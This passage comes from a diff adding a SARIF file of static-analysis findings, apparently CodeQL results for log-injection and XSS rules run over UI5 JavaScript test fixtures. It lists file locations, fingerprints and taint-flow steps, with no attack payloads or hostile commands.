"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 24, + "startColumn" : 18, + "endColumn" : 42 + } + }, + "message" : { + "text" : "`[INFO] ... 
alue1}`" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/log-injection", + "rule" : { + "id" : "js/log-injection", + "index" : 92, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + }, + "region" : { + "startLine" : 5, + "startColumn" : 17, + "endColumn" : 33 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "45280b24f3d81287:1", + "primaryLocationStartColumnFingerprint" : "12" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + }, + "region" : { + "startLine" : 5, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "req.responseText" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + }, + "region" : { + "startLine" : 5, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "req.responseText" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + }, + "region" : { + 
"startLine" : 5, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 5, + "startColumn" : 27, + "endColumn" : 32 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "92dbc37bdafc7694:1", + "primaryLocationStartColumnFingerprint" : "22" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "jQuery. ... 
param\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 9, + "endColumn" : 51 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 5, + "startColumn" : 27, + "endColumn" : 32 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 12, + "startColumn" : 27, + "endColumn" : 32 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "faa1832c387d2ee5:1", + "primaryLocationStartColumnFingerprint" : "22" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "documen ... .search" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 9, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 12, + "startColumn" : 27, + "endColumn" : 32 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : 
"js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 20, + "startColumn" : 27, + "endColumn" : 33 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "8291f53a2e235d15:1", + "primaryLocationStartColumnFingerprint" : "22" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "documen ... .search" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 9, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 39, + "endColumn" : 44 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 18, + "endColumn" : 45 + } + }, + 
"message" : { + "text" : "jQuery. ... (value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 9, + "endColumn" : 45 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 20, + "startColumn" : 27, + "endColumn" : 33 + } + }, + "message" : { + "text" : "value1" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + }, + "region" : { + "startLine" : 132, + "startColumn" : 7, + "endLine" : 134, + "endColumn" : 16 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "63ace7b071639814:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + }, + "region" : { + "startLine" : 23, + "startColumn" : 25, + "endColumn" : 48 + } + }, + "message" : { + "text" : "oSearch ... Value()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + }, + "region" : { + "startLine" : 23, + "startColumn" : 11, + "endColumn" : 48 + } + }, + "message" : { + "text" : "searchValue" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + }, + "region" : { + "startLine" : 27, + "startColumn" : 34, + "endColumn" : 45 + } + }, + "message" : { + "text" : "searchValue" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + }, + "region" : { + "startLine" : 17, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ type: \"string\" }" 
+ } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + }, + "region" : { + "startLine" : 133, + "startColumn" : 8, + "endColumn" : 27 + } + }, + "message" : { + "text" : "oControl.getTitle()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + }, + "region" : { + "startLine" : 132, + "startColumn" : 7, + "endLine" : 134, + "endColumn" : 16 + } + }, + "message" : { + "text" : "\"
T ...
\"" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + }, + "region" : { + "startLine" : 23, + "startColumn" : 25, + "endColumn" : 48 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 266 + }, + "region" : { + "startLine" : 14, + "startColumn" : 23, + "endColumn" : 41 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "fc87b07640e9d85:1", + "primaryLocationStartColumnFingerprint" : "10" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 271 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 267 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 266 + }, + "region" : { + "startLine" : 7, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 266 + }, + "region" : { + "startLine" : 14, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 271 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 275 + }, + "region" : { + "startLine" : 14, + "startColumn" : 32, + "endColumn" : 50 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "352d5eac262ae765:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 280 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 276 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 275 + }, + "region" : { + "startLine" : 7, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 275 + }, + "region" : { + "startLine" : 14, + "startColumn" : 32, + "endColumn" : 50 + } + }, + "message" : { + "text" : 
"oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 280 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 284 + }, + "region" : { + "startLine" : 14, + "startColumn" : 28, + "endColumn" : 46 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "352d5ec8b0c3bb0d:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 289 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 285 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + 
"artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 284 + }, + "region" : { + "startLine" : 7, + "startColumn" : 19, + "endColumn" : 37 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 284 + }, + "region" : { + "startLine" : 14, + "startColumn" : 28, + "endColumn" : 46 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 289 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 27, + "startColumn" : 36, + "endColumn" : 41 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "8ceecee7055f4fa2:1", + "primaryLocationStartColumnFingerprint" : "23" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 26, + "startColumn" : 25, + "endColumn" : 42 + } + }, + "message" : { + "text" : "oInput.getValue()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 26, + "startColumn" : 17, + "endColumn" : 42 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 27, + "startColumn" : 36, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 26, + "startColumn" : 25, + "endColumn" : 42 + } + }, + "message" : 
{ + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 361 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "353ad97f4bff4eae:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 367 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 363 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", + "uriBaseId" : "%SRCROOT%", + "index" : 360 + }, + "region" : { + "startLine" : 5, + "startColumn" : 15, + "endColumn" : 33 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 361 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 367 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 387 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "353ad97f4bff4eae:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 393 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 389 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 388 + }, + "region" : { + "startLine" : 7, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 387 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 393 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." 
